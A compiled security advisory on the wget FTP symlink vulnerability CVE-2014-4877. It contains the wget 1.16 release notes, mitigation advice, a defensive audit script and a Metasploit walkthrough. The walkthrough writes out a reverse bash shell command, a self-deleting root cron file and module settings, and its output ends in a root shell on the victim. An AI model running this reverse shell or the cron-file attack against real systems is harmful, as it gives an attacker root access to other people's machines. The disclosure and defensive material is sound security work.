Wget FTP Symlink Attack Vulnerability
http://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html
[Bug-wget] GNU wget 1.16 released
It is available for download here:
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz
and the GPG detached signatures using the key E163E1EA:
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz.sig
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz.sig
To reduce load on the main server, you can use this redirector service which automatically redirects you to a mirror:
http://ftpmirror.gnu.org/wget/wget-1.16.tar.gz
http://ftpmirror.gnu.org/wget/wget-1.16.tar.xz
* Noteworthy changes in Wget 1.16
** No longer create local symbolic links by default. Closes CVE-2014-4877.
** Use libpsl for verifying cookie domains.
** Default progress bar output changed.
** Introduce --show-progress to force display the progress bar.
** Introduce --no-config. The wgetrc files will not be read.
** Introduce --start-pos to allow starting downloads from a specified position.
** Fix a problem with ISA Server Proxy and keep-alive connections.
"In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on"
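The two mitigation states described above (wget 1.16 or newer, or retr-symlinks=on in /etc/wgetrc or ~/.wgetrc on an older release) can be audited with the following POSIX shell script. It is an added example, not code from the advisory or from wget; the function names are mine, and its reading of the rc files (option names case-insensitive and ignoring '-' and '_', on/yes/1 meaning true, the last assignment winning, the user file overriding the system file) is an assumption about wget's parser. A --retr-symlinks flag passed on individual command lines is outside what it can see.

```shell
#!/bin/sh
# Added example (not from the advisory or from wget itself): audit a host's
# CVE-2014-4877 state. wget >= 1.16 is fixed; older releases are mitigated
# only if retr-symlinks is "on" in the wgetrc files wget reads.

# Returns 0 when wget version $1 is 1.16 or newer (compares major.minor only).
wget_version_fixed() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%.*}
    minor=${minor%%[!0-9]*}          # tolerate suffixes such as "16-1ubuntu"
    [ "$major" -gt 1 ] 2>/dev/null && return 0
    [ "$major" -eq 1 ] 2>/dev/null && [ "$minor" -ge 16 ] 2>/dev/null
}

# Prints the last retr-symlinks value set in wgetrc file $1 (lowercased), or
# nothing if the file is unreadable or never sets it. Assumption about wget's
# rc parser: option names are case-insensitive and ignore '-' and '_'.
wgetrc_retr_symlinks() {
    [ -r "$1" ] || return 0
    tr 'A-Z' 'a-z' < "$1" |
        sed -n 's/^[[:space:]]*retr[-_]*symlinks[[:space:]]*=[[:space:]]*\([a-z0-9]*\).*/\1/p' |
        tail -n 1
}

# Verdict for one host: prints "fixed", "mitigated" or "VULNERABLE" (exit 1).
# $1 is the wget version string; the remaining arguments are wgetrc files in
# the order wget reads them (system file first, user file overrides it).
cve_2014_4877_status() {
    ver=$1; shift
    if wget_version_fixed "$ver"; then echo fixed; return 0; fi
    effective=""
    for f in "$@"; do
        v=$(wgetrc_retr_symlinks "$f")
        [ -n "$v" ] && effective=$v
    done
    case $effective in
        on|yes|1) echo mitigated; return 0 ;;   # booleans wget accepts as true
        *)        echo VULNERABLE; return 1 ;;
    esac
}

# Audit the local host, if wget is installed (constructed usage).
audit_local_wget() {
    command -v wget >/dev/null 2>&1 || { echo "wget not installed"; return 0; }
    ver=$(wget --version | sed -n '1s/.*Wget \([0-9][0-9.]*\).*/\1/p')
    cve_2014_4877_status "$ver" /etc/wgetrc "$HOME/.wgetrc"
}
```

Call audit_local_wget on each host; a non-zero exit marks a host that still creates local symlinks from FTP listings by default.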
Exploitation
We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.
# msfpayload cmd/unix/reverse_bash LHOST=192.168.0.4 LPORT=4444 R
0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112
Next we create a crontab file that runs once a minute, launches this command, and deletes itself:
# cat>cronshell <<EOD
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell
EOD
Now we start up msfconsole and configure a shell listener:
# msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash
msf exploit(handler) > set LHOST 192.168.0.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.4:4444
Finally we switch to the wget module itself:
msf exploit(handler) > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell
msf auxiliary(wget_symlink_file_write) > set SRVPORT 21
msf auxiliary(wget_symlink_file_write) > run
[+] Targets should run: $ wget -m ftp://192.168.0.4:21/
[*] Server started.
At this point, we just wait for the target user to run wget -m ftp://192.168.0.4:21/
[*] 192.168.0.2:52251 Logged in with user 'anonymous' and password 'anonymous'...
[*] 192.168.0.2:52251 -> LIST -a
[*] 192.168.0.2:52251 -> CWD /1X9ftwhI7G1ENa
[*] 192.168.0.2:52251 -> LIST -a
[*] 192.168.0.2:52251 -> RETR cronshell
[+] 192.168.0.2:52251 Hopefully wrote 186 bytes to /etc/cron.d/cronshell
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.2:58498) at 2014-10-27 23:19:02 -0500
msf auxiliary(wget_symlink_file_write) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root) groups=0(root),1001(rvm)